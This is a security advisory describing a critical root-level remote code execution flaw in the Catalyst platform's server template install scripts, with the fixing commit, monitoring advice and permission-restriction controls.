The Catalyst platform is subject to a critical remote code execution vulnerability where authenticated users can gain full root-level access to all nodes in a cluster.

The vulnerability exists in the way install scripts in server templates are handled, executing directly on the host via bash -c without sandboxing. This allows an authenticated attacker with template.create or template.update permissions to achieve root-level remote code execution.

The impact is catastrophic, as an attacker can gain total control over every node machine within the Catalyst cluster. This could lead to the theft of sensitive billing data, destruction of game community assets, and complete infrastructure takeover. The CVSS score of 9.9 underscores the extreme risk posed by this lack of isolation.

Immediate Action: Apply the security fix identified in commit 11980aaf3f46315b02777f325ba02c56b110165d or update to the latest version.

Proactive Monitoring: Audit all existing server templates for suspicious shell commands and monitor node operating systems for unauthorized root-level activity.

Compensating Controls: Restrict template.create and template.update permissions to only the most trusted administrative personnel until the patch is applied.

Public Exploit Available: false

The absence of containerization for administrative scripts represents a fundamental security failure. It is imperative that administrators update their Catalyst installations immediately. Furthermore, organizations should adopt a principle of least privilege for all template-related permissions to minimize the internal attack surface.